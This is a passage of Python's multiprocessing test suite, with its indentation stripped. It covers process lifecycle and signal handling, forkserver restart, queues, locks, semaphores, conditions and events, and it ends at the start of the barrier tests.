proc2 = self.Process(target=self._test, daemon=False)
self.assertFalse(proc2.daemon)
@classmethod
def _test(cls, q, *args, **kwds):
current = cls.current_process()
q.put(args)
q.put(kwds)
q.put(current.name)
if cls.TYPE != 'threads':
q.put(bytes(current.authkey))
q.put(current.pid)
def test_process(self):
q = self.Queue(1)
e = self.Event()
args = (q, 1, 2)
kwargs = {'hello':23, 'bye':2.54}
name = 'SomeProcess'
p = self.Process(
target=self._test, args=args, kwargs=kwargs, name=name
)
p.daemon = True
current = self.current_process()
if self.TYPE != 'threads':
self.assertEqual(p.authkey, current.authkey)
self.assertEqual(p.is_alive(), False)
self.assertEqual(p.daemon, True)
self.assertNotIn(p, self.active_children())
self.assertTrue(type(self.active_children()) is list)
self.assertEqual(p.exitcode, None)
p.start()
self.assertEqual(p.exitcode, None)
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(q.get(), args[1:])
self.assertEqual(q.get(), kwargs)
self.assertEqual(q.get(), p.name)
if self.TYPE != 'threads':
self.assertEqual(q.get(), current.authkey)
self.assertEqual(q.get(), p.pid)
p.join()
self.assertEqual(p.exitcode, 0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
close_queue(q)
@classmethod
def _sleep_some(cls):
time.sleep(100)
@classmethod
def _test_sleep(cls, delay):
time.sleep(delay)
def _kill_process(self, meth):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
p = self.Process(target=self._sleep_some)
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(p.exitcode, None)
join = TimingWrapper(p.join)
self.assertEqual(join(0), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), True)
self.assertEqual(join(-1), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), True)
# XXX maybe terminating too soon causes the problems on Gentoo...
time.sleep(1)
meth(p)
if hasattr(signal, 'alarm'):
# On the Gentoo buildbot waitpid() often seems to block forever.
# We use alarm() to interrupt it if it blocks for too long.
def handler(*args):
raise RuntimeError('join took too long: %s' % p)
old_handler = signal.signal(signal.SIGALRM, handler)
try:
signal.alarm(10)
self.assertEqual(join(), None)
finally:
signal.alarm(0)
signal.signal(signal.SIGALRM, old_handler)
else:
self.assertEqual(join(), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
p.join()
return p.exitcode
def test_terminate(self):
exitcode = self._kill_process(multiprocessing.Process.terminate)
if os.name != 'nt':
self.assertEqual(exitcode, -signal.SIGTERM)
def test_kill(self):
exitcode = self._kill_process(multiprocessing.Process.kill)
if os.name != 'nt':
self.assertEqual(exitcode, -signal.SIGKILL)
def test_cpu_count(self):
try:
cpus = multiprocessing.cpu_count()
except NotImplementedError:
cpus = 1
self.assertTrue(type(cpus) is int)
self.assertTrue(cpus >= 1)
def test_active_children(self):
self.assertEqual(type(self.active_children()), list)
p = self.Process(target=time.sleep, args=(DELTA,))
self.assertNotIn(p, self.active_children())
p.daemon = True
p.start()
self.assertIn(p, self.active_children())
p.join()
self.assertNotIn(p, self.active_children())
@classmethod
def _test_recursion(cls, wconn, id):
wconn.send(id)
if len(id) < 2:
for i in range(2):
p = cls.Process(
target=cls._test_recursion, args=(wconn, id+[i])
)
p.start()
p.join()
def test_recursion(self):
rconn, wconn = self.Pipe(duplex=False)
self._test_recursion(wconn, [])
time.sleep(DELTA)
result = []
while rconn.poll():
result.append(rconn.recv())
expected = [
[],
[0],
[0, 0],
[0, 1],
[1],
[1, 0],
[1, 1]
]
self.assertEqual(result, expected)
@classmethod
def _test_sentinel(cls, event):
event.wait(10.0)
def test_sentinel(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
event = self.Event()
p = self.Process(target=self._test_sentinel, args=(event,))
with self.assertRaises(ValueError):
p.sentinel
p.start()
self.addCleanup(p.join)
sentinel = p.sentinel
self.assertIsInstance(sentinel, int)
self.assertFalse(wait_for_handle(sentinel, timeout=0.0))
event.set()
p.join()
self.assertTrue(wait_for_handle(sentinel, timeout=1))
@classmethod
def _test_close(cls, rc=0, q=None):
if q is not None:
q.get()
sys.exit(rc)
def test_close(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
q = self.Queue()
p = self.Process(target=self._test_close, kwargs={'q': q})
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
# Child is still alive, cannot close
with self.assertRaises(ValueError):
p.close()
q.put(None)
p.join()
self.assertEqual(p.is_alive(), False)
self.assertEqual(p.exitcode, 0)
p.close()
with self.assertRaises(ValueError):
p.is_alive()
with self.assertRaises(ValueError):
p.join()
with self.assertRaises(ValueError):
p.terminate()
p.close()
wr = weakref.ref(p)
del p
gc.collect()
self.assertIs(wr(), None)
close_queue(q)
def test_many_processes(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
N = 5 if sm == 'spawn' else 100
# Try to overwhelm the forkserver loop with events
procs = [self.Process(target=self._test_sleep, args=(0.01,))
for i in range(N)]
for p in procs:
p.start()
for p in procs:
join_process(p)
for p in procs:
self.assertEqual(p.exitcode, 0)
procs = [self.Process(target=self._sleep_some)
for i in range(N)]
for p in procs:
p.start()
time.sleep(0.001) # let the children start...
for p in procs:
p.terminate()
for p in procs:
join_process(p)
if os.name != 'nt':
exitcodes = [-signal.SIGTERM]
if sys.platform == 'darwin':
# bpo-31510: On macOS, killing a freshly started process with
# SIGTERM sometimes kills the process with SIGKILL.
exitcodes.append(-signal.SIGKILL)
for p in procs:
self.assertIn(p.exitcode, exitcodes)
def test_lose_target_ref(self):
c = DummyCallable()
wr = weakref.ref(c)
q = self.Queue()
p = self.Process(target=c, args=(q, c))
del c
p.start()
p.join()
self.assertIs(wr(), None)
self.assertEqual(q.get(), 5)
close_queue(q)
@classmethod
def _test_child_fd_inflation(self, evt, q):
q.put(test.support.fd_count())
evt.wait()
def test_child_fd_inflation(self):
# Number of fds in child processes should not grow with the
# number of running children.
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
if sm == 'fork':
# The fork method by design inherits all fds from the parent,
# trying to go against it is a lost battle
self.skipTest('test not appropriate for {}'.format(sm))
N = 5
evt = self.Event()
q = self.Queue()
procs = [self.Process(target=self._test_child_fd_inflation, args=(evt, q))
for i in range(N)]
for p in procs:
p.start()
try:
fd_counts = [q.get() for i in range(N)]
self.assertEqual(len(set(fd_counts)), 1, fd_counts)
finally:
evt.set()
for p in procs:
p.join()
close_queue(q)
@classmethod
def _test_wait_for_threads(self, evt):
def func1():
time.sleep(0.5)
evt.set()
def func2():
time.sleep(20)
evt.clear()
threading.Thread(target=func1).start()
threading.Thread(target=func2, daemon=True).start()
def test_wait_for_threads(self):
# A child process should wait for non-daemonic threads to end
# before exiting
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
evt = self.Event()
proc = self.Process(target=self._test_wait_for_threads, args=(evt,))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
@classmethod
def _test_error_on_stdio_flush(self, evt, break_std_streams={}):
for stream_name, action in break_std_streams.items():
if action == 'close':
stream = io.StringIO()
stream.close()
else:
assert action == 'remove'
stream = None
setattr(sys, stream_name, None)
evt.set()
def test_error_on_stdio_flush_1(self):
# Check that Process works with broken standard streams
streams = [io.StringIO(), None]
streams[0].close()
for stream_name in ('stdout', 'stderr'):
for stream in streams:
old_stream = getattr(sys, stream_name)
setattr(sys, stream_name, stream)
try:
evt = self.Event()
proc = self.Process(target=self._test_error_on_stdio_flush,
args=(evt,))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
self.assertEqual(proc.exitcode, 0)
finally:
setattr(sys, stream_name, old_stream)
def test_error_on_stdio_flush_2(self):
# Same as test_error_on_stdio_flush_1(), but standard streams are
# broken by the child process
for stream_name in ('stdout', 'stderr'):
for action in ('close', 'remove'):
old_stream = getattr(sys, stream_name)
try:
evt = self.Event()
proc = self.Process(target=self._test_error_on_stdio_flush,
args=(evt, {stream_name: action}))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
self.assertEqual(proc.exitcode, 0)
finally:
setattr(sys, stream_name, old_stream)
@classmethod
def _sleep_and_set_event(self, evt, delay=0.0):
time.sleep(delay)
evt.set()
def check_forkserver_death(self, signum):
# bpo-31308: if the forkserver process has died, we should still
# be able to create and run new Process instances (the forkserver
# is implicitly restarted).
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
if sm != 'forkserver':
            # This check is specific to the forkserver start method; the other
            # start methods have no forkserver process to kill.
self.skipTest('test not appropriate for {}'.format(sm))
from multiprocessing.forkserver import _forkserver
_forkserver.ensure_running()
# First process sleeps 500 ms
delay = 0.5
evt = self.Event()
proc = self.Process(target=self._sleep_and_set_event, args=(evt, delay))
proc.start()
pid = _forkserver._forkserver_pid
os.kill(pid, signum)
# give time to the fork server to die and time to proc to complete
time.sleep(delay * 2.0)
evt2 = self.Event()
proc2 = self.Process(target=self._sleep_and_set_event, args=(evt2,))
proc2.start()
proc2.join()
self.assertTrue(evt2.is_set())
self.assertEqual(proc2.exitcode, 0)
proc.join()
self.assertTrue(evt.is_set())
self.assertIn(proc.exitcode, (0, 255))
def test_forkserver_sigint(self):
# Catchable signal
self.check_forkserver_death(signal.SIGINT)
def test_forkserver_sigkill(self):
# Uncatchable signal
if os.name != 'nt':
self.check_forkserver_death(signal.SIGKILL)
#
#
#
class _UpperCaser(multiprocessing.Process):
def __init__(self):
multiprocessing.Process.__init__(self)
self.child_conn, self.parent_conn = multiprocessing.Pipe()
def run(self):
self.parent_conn.close()
for s in iter(self.child_conn.recv, None):
self.child_conn.send(s.upper())
self.child_conn.close()
def submit(self, s):
assert type(s) is str
self.parent_conn.send(s)
return self.parent_conn.recv()
def stop(self):
self.parent_conn.send(None)
self.parent_conn.close()
self.child_conn.close()
class _TestSubclassingProcess(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_subclassing(self):
uppercaser = _UpperCaser()
uppercaser.daemon = True
uppercaser.start()
self.assertEqual(uppercaser.submit('hello'), 'HELLO')
self.assertEqual(uppercaser.submit('world'), 'WORLD')
uppercaser.stop()
uppercaser.join()
def test_stderr_flush(self):
# sys.stderr is flushed at process shutdown (issue #13812)
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
testfn = test.support.TESTFN
self.addCleanup(test.support.unlink, testfn)
proc = self.Process(target=self._test_stderr_flush, args=(testfn,))
proc.start()
proc.join()
with open(testfn, 'r') as f:
err = f.read()
# The whole traceback was printed
self.assertIn("ZeroDivisionError", err)
self.assertIn("test_multiprocessing.py", err)
self.assertIn("1/0 # MARKER", err)
@classmethod
def _test_stderr_flush(cls, testfn):
fd = os.open(testfn, os.O_WRONLY | os.O_CREAT | os.O_EXCL)
sys.stderr = open(fd, 'w', closefd=False)
1/0 # MARKER
@classmethod
def _test_sys_exit(cls, reason, testfn):
fd = os.open(testfn, os.O_WRONLY | os.O_CREAT | os.O_EXCL)
sys.stderr = open(fd, 'w', closefd=False)
sys.exit(reason)
def test_sys_exit(self):
# See Issue 13854
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
testfn = test.support.TESTFN
self.addCleanup(test.support.unlink, testfn)
for reason in (
[1, 2, 3],
'ignore this',
):
p = self.Process(target=self._test_sys_exit, args=(reason, testfn))
p.daemon = True
p.start()
join_process(p)
self.assertEqual(p.exitcode, 1)
with open(testfn, 'r') as f:
content = f.read()
self.assertEqual(content.rstrip(), str(reason))
os.unlink(testfn)
for reason in (True, False, 8):
p = self.Process(target=sys.exit, args=(reason,))
p.daemon = True
p.start()
join_process(p)
self.assertEqual(p.exitcode, reason)
#
#
#
def queue_empty(q):
if hasattr(q, 'empty'):
return q.empty()
else:
return q.qsize() == 0
def queue_full(q, maxsize):
if hasattr(q, 'full'):
return q.full()
else:
return q.qsize() == maxsize
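# Illustrative sketch (not part of the original test suite): the helpers above
# fall back to qsize() for proxy queues that do not implement empty()/full().
def _example_queue_helpers():  # pragma: no cover
    q = pyqueue.Queue(maxsize=1)
    assert queue_empty(q)
    q.put(1)
    assert queue_full(q, 1)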
class _TestQueue(BaseTestCase):
@classmethod
def _test_put(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
for i in range(6):
queue.get()
parent_can_continue.set()
def test_put(self):
MAXSIZE = 6
queue = self.Queue(maxsize=MAXSIZE)
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_put,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
queue.put(1)
queue.put(2, True)
queue.put(3, True, None)
queue.put(4, False)
queue.put(5, False, None)
queue.put_nowait(6)
# the values may be in buffer but not yet in pipe so sleep a bit
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
self.assertEqual(queue_full(queue, MAXSIZE), True)
put = TimingWrapper(queue.put)
put_nowait = TimingWrapper(queue.put_nowait)
self.assertRaises(pyqueue.Full, put, 7, False)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, False, None)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put_nowait, 7)
self.assertTimingAlmostEqual(put_nowait.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, True, TIMEOUT1)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT1)
self.assertRaises(pyqueue.Full, put, 7, False, TIMEOUT2)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, True, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT3)
child_can_start.set()
parent_can_continue.wait()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
proc.join()
close_queue(queue)
@classmethod
def _test_get(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
#queue.put(1)
queue.put(2)
queue.put(3)
queue.put(4)
queue.put(5)
parent_can_continue.set()
def test_get(self):
queue = self.Queue()
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_get,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
child_can_start.set()
parent_can_continue.wait()
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
# Hangs unexpectedly, remove for now
#self.assertEqual(queue.get(), 1)
self.assertEqual(queue.get(True, None), 2)
self.assertEqual(queue.get(True), 3)
self.assertEqual(queue.get(timeout=1), 4)
self.assertEqual(queue.get_nowait(), 5)
self.assertEqual(queue_empty(queue), True)
get = TimingWrapper(queue.get)
get_nowait = TimingWrapper(queue.get_nowait)
self.assertRaises(pyqueue.Empty, get, False)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, False, None)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get_nowait)
self.assertTimingAlmostEqual(get_nowait.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, True, TIMEOUT1)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
self.assertRaises(pyqueue.Empty, get, False, TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT3)
proc.join()
close_queue(queue)
@classmethod
def _test_fork(cls, queue):
for i in range(10, 20):
queue.put(i)
# note that at this point the items may only be buffered, so the
        # process cannot shut down until the feeder thread has finished
# pushing items onto the pipe.
def test_fork(self):
# Old versions of Queue would fail to create a new feeder
# thread for a forked process if the original process had its
# own feeder thread. This test checks that this no longer
# happens.
queue = self.Queue()
# put items on queue so that main process starts a feeder thread
for i in range(10):
queue.put(i)
# wait to make sure thread starts before we fork a new process
time.sleep(DELTA)
# fork process
p = self.Process(target=self._test_fork, args=(queue,))
p.daemon = True
p.start()
# check that all expected items are in the queue
for i in range(20):
self.assertEqual(queue.get(), i)
self.assertRaises(pyqueue.Empty, queue.get, False)
p.join()
close_queue(queue)
def test_qsize(self):
q = self.Queue()
try:
self.assertEqual(q.qsize(), 0)
except NotImplementedError:
self.skipTest('qsize method not implemented')
q.put(1)
self.assertEqual(q.qsize(), 1)
q.put(5)
self.assertEqual(q.qsize(), 2)
q.get()
self.assertEqual(q.qsize(), 1)
q.get()
self.assertEqual(q.qsize(), 0)
close_queue(q)
@classmethod
def _test_task_done(cls, q):
for obj in iter(q.get, None):
time.sleep(DELTA)
q.task_done()
def test_task_done(self):
queue = self.JoinableQueue()
workers = [self.Process(target=self._test_task_done, args=(queue,))
for i in range(4)]
for p in workers:
p.daemon = True
p.start()
for i in range(10):
queue.put(i)
queue.join()
for p in workers:
queue.put(None)
for p in workers:
p.join()
close_queue(queue)
def test_no_import_lock_contention(self):
with test.support.temp_cwd():
module_name = 'imported_by_an_imported_module'
with open(module_name + '.py', 'w') as f:
f.write("""if 1:
import multiprocessing
q = multiprocessing.Queue()
q.put('knock knock')
q.get(timeout=3)
q.close()
del q
""")
with test.support.DirsOnSysPath(os.getcwd()):
try:
__import__(module_name)
except pyqueue.Empty:
self.fail("Probable regression on import lock contention;"
" see Issue #22853")
def test_timeout(self):
q = multiprocessing.Queue()
start = time.monotonic()
self.assertRaises(pyqueue.Empty, q.get, True, 0.200)
delta = time.monotonic() - start
# bpo-30317: Tolerate a delta of 100 ms because of the bad clock
# resolution on Windows (usually 15.6 ms). x86 Windows7 3.x once
# failed because the delta was only 135.8 ms.
self.assertGreaterEqual(delta, 0.100)
close_queue(q)
def test_queue_feeder_donot_stop_onexc(self):
# bpo-30414: verify feeder handles exceptions correctly
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class NotSerializable(object):
def __reduce__(self):
raise AttributeError
with test.support.captured_stderr():
q = self.Queue()
q.put(NotSerializable())
q.put(True)
# bpo-30595: use a timeout of 1 second for slow buildbots
self.assertTrue(q.get(timeout=1.0))
close_queue(q)
with test.support.captured_stderr():
# bpo-33078: verify that the queue size is correctly handled
# on errors.
q = self.Queue(maxsize=1)
q.put(NotSerializable())
q.put(True)
try:
self.assertEqual(q.qsize(), 1)
except NotImplementedError:
# qsize is not available on all platform as it
# relies on sem_getvalue
pass
# bpo-30595: use a timeout of 1 second for slow buildbots
self.assertTrue(q.get(timeout=1.0))
# Check that the size of the queue is correct
self.assertTrue(q.empty())
close_queue(q)
def test_queue_feeder_on_queue_feeder_error(self):
# bpo-30006: verify feeder handles exceptions using the
# _on_queue_feeder_error hook.
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class NotSerializable(object):
"""Mock unserializable object"""
def __init__(self):
self.reduce_was_called = False
self.on_queue_feeder_error_was_called = False
def __reduce__(self):
self.reduce_was_called = True
raise AttributeError
class SafeQueue(multiprocessing.queues.Queue):
"""Queue with overloaded _on_queue_feeder_error hook"""
@staticmethod
def _on_queue_feeder_error(e, obj):
if (isinstance(e, AttributeError) and
isinstance(obj, NotSerializable)):
obj.on_queue_feeder_error_was_called = True
not_serializable_obj = NotSerializable()
# The captured_stderr reduces the noise in the test report
with test.support.captured_stderr():
q = SafeQueue(ctx=multiprocessing.get_context())
q.put(not_serializable_obj)
# Verify that q is still functioning correctly
q.put(True)
self.assertTrue(q.get(timeout=1.0))
# Assert that the serialization and the hook have been called correctly
self.assertTrue(not_serializable_obj.reduce_was_called)
self.assertTrue(not_serializable_obj.on_queue_feeder_error_was_called)
def test_closed_queue_put_get_exceptions(self):
for q in multiprocessing.Queue(), multiprocessing.JoinableQueue():
q.close()
with self.assertRaisesRegex(ValueError, 'is closed'):
q.put('foo')
with self.assertRaisesRegex(ValueError, 'is closed'):
q.get()
#
#
#
class _TestLock(BaseTestCase):
def test_lock(self):
lock = self.Lock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(False), False)
self.assertEqual(lock.release(), None)
self.assertRaises((ValueError, threading.ThreadError), lock.release)
def test_rlock(self):
lock = self.RLock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertRaises((AssertionError, RuntimeError), lock.release)
def test_lock_context(self):
with self.Lock():
pass
class _TestSemaphore(BaseTestCase):
def _test_semaphore(self, sem):
self.assertReturnsIfImplemented(2, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.acquire(False), False)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(2, get_value, sem)
def test_semaphore(self):
sem = self.Semaphore(2)
self._test_semaphore(sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(3, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(4, get_value, sem)
def test_bounded_semaphore(self):
sem = self.BoundedSemaphore(2)
self._test_semaphore(sem)
# Currently fails on OS/X
#if HAVE_GETVALUE:
# self.assertRaises(ValueError, sem.release)
# self.assertReturnsIfImplemented(2, get_value, sem)
def test_timeout(self):
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sem = self.Semaphore(0)
acquire = TimingWrapper(sem.acquire)
self.assertEqual(acquire(False), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, None), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, TIMEOUT1), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0)
self.assertEqual(acquire(True, TIMEOUT2), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT2)
self.assertEqual(acquire(timeout=TIMEOUT3), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT3)
class _TestCondition(BaseTestCase):
@classmethod
def f(cls, cond, sleeping, woken, timeout=None):
cond.acquire()
sleeping.release()
cond.wait(timeout)
woken.release()
cond.release()
def assertReachesEventually(self, func, value):
for i in range(10):
try:
if func() == value:
break
except NotImplementedError:
break
time.sleep(DELTA)
time.sleep(DELTA)
self.assertReturnsIfImplemented(value, func)
def check_invariant(self, cond):
# this is only supposed to succeed when there are no sleepers
if self.TYPE == 'processes':
try:
sleepers = (cond._sleeping_count.get_value() -
cond._woken_count.get_value())
self.assertEqual(sleepers, 0)
self.assertEqual(cond._wait_semaphore.get_value(), 0)
except NotImplementedError:
pass
def test_notify(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
p = threading.Thread(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
# wait for both children to start sleeping
sleeping.acquire()
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake up one process/thread
cond.acquire()
cond.notify()
cond.release()
# check one process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(1, get_value, woken)
# wake up another
cond.acquire()
cond.notify()
cond.release()
# check other has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(2, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
p.join()
def test_notify_all(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes which will timeout
for i in range(3):
p = self.Process(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them all to sleep
for i in range(6):
sleeping.acquire()
# check they have all timed out
for i in range(6):
woken.acquire()
self.assertReturnsIfImplemented(0, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
# start some more threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them to all sleep
for i in range(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake them all up
cond.acquire()
cond.notify_all()
cond.release()
# check they have all woken
self.assertReachesEventually(lambda: get_value(woken), 6)
# check state is not mucked up
self.check_invariant(cond)
def test_notify_n(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them to all sleep
for i in range(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake some of them up
cond.acquire()
cond.notify(n=2)
cond.release()
# check 2 have woken
self.assertReachesEventually(lambda: get_value(woken), 2)
# wake the rest of them
cond.acquire()
cond.notify(n=4)
cond.release()
self.assertReachesEventually(lambda: get_value(woken), 6)
# doesn't do anything more
cond.acquire()
cond.notify(n=3)
cond.release()
self.assertReturnsIfImplemented(6, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
def test_timeout(self):
cond = self.Condition()
wait = TimingWrapper(cond.wait)
cond.acquire()
res = wait(TIMEOUT1)
cond.release()
self.assertEqual(res, False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
@classmethod
def _test_waitfor_f(cls, cond, state):
with cond:
state.value = 0
cond.notify()
result = cond.wait_for(lambda : state.value==4)
if not result or state.value != 4:
sys.exit(1)
@unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
def test_waitfor(self):
# based on test in test/lock_tests.py
cond = self.Condition()
state = self.Value('i', -1)
p = self.Process(target=self._test_waitfor_f, args=(cond, state))
p.daemon = True
p.start()
with cond:
result = cond.wait_for(lambda : state.value==0)
self.assertTrue(result)
self.assertEqual(state.value, 0)
for i in range(4):
time.sleep(0.01)
with cond:
state.value += 1
cond.notify()
join_process(p)
self.assertEqual(p.exitcode, 0)
@classmethod
def _test_waitfor_timeout_f(cls, cond, state, success, sem):
sem.release()
with cond:
expected = 0.1
dt = time.monotonic()
result = cond.wait_for(lambda : state.value==4, timeout=expected)
dt = time.monotonic() - dt
# borrow logic in assertTimeout() from test/lock_tests.py
if not result and expected * 0.6 < dt < expected * 10.0:
success.value = True
@unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
def test_waitfor_timeout(self):
# based on test in test/lock_tests.py
cond = self.Condition()
state = self.Value('i', 0)
success = self.Value('i', False)
sem = self.Semaphore(0)
p = self.Process(target=self._test_waitfor_timeout_f,
args=(cond, state, success, sem))
p.daemon = True
p.start()
self.assertTrue(sem.acquire(timeout=TIMEOUT))
# Only increment 3 times, so state == 4 is never reached.
for i in range(3):
time.sleep(0.01)
with cond:
state.value += 1
cond.notify()
join_process(p)
self.assertTrue(success.value)
@classmethod
def _test_wait_result(cls, c, pid):
with c:
c.notify()
time.sleep(1)
if pid is not None:
os.kill(pid, signal.SIGINT)
def test_wait_result(self):
if isinstance(self, ProcessesMixin) and sys.platform != 'win32':
pid = os.getpid()
else:
pid = None
c = self.Condition()
with c:
self.assertFalse(c.wait(0))
self.assertFalse(c.wait(0.1))
p = self.Process(target=self._test_wait_result, args=(c, pid))
p.start()
self.assertTrue(c.wait(60))
if pid is not None:
self.assertRaises(KeyboardInterrupt, c.wait, 60)
p.join()
class _TestEvent(BaseTestCase):
@classmethod
def _test_event(cls, event):
time.sleep(TIMEOUT2)
event.set()
def test_event(self):
event = self.Event()
wait = TimingWrapper(event.wait)
# Removed temporarily, due to API shear, this does not
# work with threading._Event objects. is_set == isSet
self.assertEqual(event.is_set(), False)
# Removed, threading.Event.wait() will return the value of the __flag
# instead of None. API Shear with the semaphore backed mp.Event
self.assertEqual(wait(0.0), False)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
event.set()
# See note above on the API differences
self.assertEqual(event.is_set(), True)
self.assertEqual(wait(), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
# self.assertEqual(event.is_set(), True)
event.clear()
#self.assertEqual(event.is_set(), False)
p = self.Process(target=self._test_event, args=(event,))
p.daemon = True
p.start()
self.assertEqual(wait(), True)
p.join()
#
# Tests for Barrier - adapted from tests in test/lock_tests.py
#
# Many of the tests for threading.Barrier use a list as an atomic
# counter: a value is appended to increment the counter, and the
# length of the list gives the value. We use the class DummyList
# for the same purpose.
class _DummyList(object):
def __init__(self):
wrapper = multiprocessing.heap.BufferWrapper(struct.calcsize('i'))
